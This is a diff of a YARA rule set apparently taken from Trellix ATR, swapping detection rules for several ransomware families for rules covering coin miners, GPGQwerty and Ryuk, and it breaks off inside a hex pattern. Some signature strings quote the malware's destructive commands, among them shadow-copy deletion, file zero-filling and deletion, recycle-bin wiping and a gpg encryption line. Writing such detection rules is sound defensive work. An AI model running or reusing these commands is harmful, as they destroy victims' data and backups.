+		$sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 }
+		$sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 }
+		$sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 }
+		$sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 }
+		$sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 }
+		$sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 }
+		$sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 }
+		$sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 }
+		$sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 }
+		$sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 }
+		$sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( $s1 and $s2 ) or ( $s1 and $s3 ) or $s1
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE
 {
 	meta:
-		description = "Rule to detect Pico Ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481"
-		date = "2018-08-30"
-		modified = "2020-08-14"
-		reference = "https://twitter.com/siri_urz/status/1035138577934557184"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Pico.yar#L1-L37"
+		description = "Monero mining software"
+		author = "Trellix ATR team"
+		id = "98ee7711-16ee-58e1-b52f-c68dd5f2b8a3"
+		date = "2018-04-05"
+		modified = "2022-01-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/MINER_Monero.yar#L1-L43"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06"
-		logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed"
+		logic_hash = "4c1815186b0eb9e6be5fb0fcad02fd981ac9cf79c485fe12ce4a73054ef9fda2"
 		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "MINER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Pico"
+		malware_type = "miner"
+		malware_family = "Ransom:W32/MoneroMiner"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii
-		$s2 = "\\Downloads\\README.txt" fullword ascii
-		$s3 = "\\Music\\README.txt" fullword ascii
-		$s4 = "\\Videos\\README.txt" fullword ascii
-		$s5 = "\\Pictures\\README.txt" fullword ascii
-		$s6 = "\\Desktop\\README.txt" fullword ascii
-		$s7 = "\\Documents\\README.txt" fullword ascii
-		$s8 = "/c taskkill /im " fullword ascii
-		$s9 = "\\AppData\\Roaming\\" fullword ascii
-		$s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide
-		$s11 = "AppData\\Roaming" fullword ascii
-		$s12 = "\\Downloads" fullword ascii
-		$s13 = "operator co_await" fullword ascii
+		$1 = "* COMMANDS:     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$2 = "--cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" fullword ascii
+		$3 = "* THREADS:      %d, %s, av=%d, %sdonate=%d%%%s" fullword ascii
+		$4 = "--user-agent         set custom user-agent string for pool" fullword ascii
+		$5 = "-O, --userpass=U:P       username:password pair for mining server" fullword ascii
+		$6 = "--cpu-priority       set process priority (0 idle, 2 normal to 5 highest)" fullword ascii
+		$7 = "-p, --pass=PASSWORD      password for mining server" fullword ascii
+		$8 = "* VERSIONS:     XMRig/%s libuv/%s%s" fullword ascii
+		$9 = "-k, --keepalive          send keepalived for prevent timeout (need pool support)" fullword ascii
+		$10 = "--max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)" fullword ascii
+		$11 = "--nicehash           enable nicehash/xmrig-proxy support" fullword ascii
+		$12 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
+		$13 = "* CPU:          %s (%d) %sx64 %sAES-NI" fullword ascii
+		$14 = "-r, --retries=N          number of times to retry before switch to backup server (default: 5)" fullword ascii
+		$15 = "-B, --background         run the miner in the background" fullword ascii
+		$16 = "* API PORT:     %d" fullword ascii
+		$17 = "--api-access-token=T access token for API" fullword ascii
+		$18 = "-t, --threads=N          number of miner threads" fullword ascii
+		$19 = "--print-time=N       print hashrate report every N seconds" fullword ascii
+		$20 = "-u, --user=USERNAME      username for mining server" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 8 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Lockbit2_Jul21 : FILE
+
+rule TRELLIX_ARC_Trojan_Coinminer : FILE
 {
 	meta:
-		description = "simple rule to detect latest Lockbit ransomware Jul 2021"
-		author = "CB @ ATR"
-		id = "22b423df-ae5c-5672-95be-333b13791fc6"
-		date = "2021-07-28"
-		modified = "2021-07-28"
+		description = "Rule to detect Coinminer malware"
+		author = "Trellix ATR"
+		id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298"
+		date = "2021-07-22"
+		modified = "2022-01-19"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Lockbit2.yar#L1-L25"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/Trojan_CoinMiner.yar#L3-L23"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159"
-		score = 50
+		logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd"
+		score = 75
 		quality = 70
 		tags = "FILE"
 		version = "v1"
-		hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202"
-		hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d"
+		hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2"
+		hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7"
 
 	strings:
-		$seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide
-		$seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide
-		$p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide
-		$p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide
-		$p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide
-		$p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide
-		$p5 = "https://tox.chat/download.html" fullword wide
-		$p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide
-		$p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide
-		$p8 = "\\LockBit_Ransomware.hta" fullword wide
+		$seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c }
+		$seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e }
+		$seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 }
+		$seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f }
+		$seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a }
+		$seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $seq* ) and 4 of them ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ( $seq* ) )
 }
-rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE
+rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect Babuk Locker"
-		author = "TS @ McAfee ATR"
-		id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8"
-		date = "2021-01-19"
-		modified = "2021-02-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25"
+		description = "Detect GPGQwerty ransomware"
+		author = "McAfee Labs"
+		id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2"
+		date = "2018-03-21"
+		modified = "2020-08-14"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_GPGQwerty.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e10713a4a5f635767dcd54d609bed977"
-		logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f"
+		logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897"
 		score = 75
 		quality = 70
-		tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE"
-		rule_version = "v2"
-		malware_family = "Ransom:Win/Babuk"
-		malware_type = "Ransom"
-		mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003"
+		tags = "RANSOMWARE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/GPGQwerty"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074}
-		$s2 = "delete shadows /all /quiet" fullword wide
-		$pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300}
-		$pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071}
-		$pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640}
-		$pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815}
+		$a = "gpg.exe –recipient qwerty  -o"
+		$b = "%s%s.%d.qwerty"
+		$c = "del /Q /F /S %s$recycle.bin"
+		$d = "cryz1@protonmail.com"
 
 	condition:
-		filesize >= 15KB and filesize <= 90KB and 1 of ( $s* ) and 3 of ( $pattern* )
+		all of them
 }
-rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Netwalker ransomware"
-		author = "McAfee ATR Team"
-		id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617"
-		date = "2020-03-30"
-		modified = "2020-11-20"
-		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L3-L28"
+		description = "Ryuk Ransomware hunting rule"
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9"
+		date = "2019-04-25"
+		modified = "2021-07-12"
+		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L1-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6"
-		score = 75
+		logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b"
+		score = 50
 		quality = 70
 		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
+		rule_version = "v2"
 		malware_type = "ransomware"
-		note = "The rule doesn't detect the samples packed with UPX"
+		malware_family = "Ransom:W32/Ryuk"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??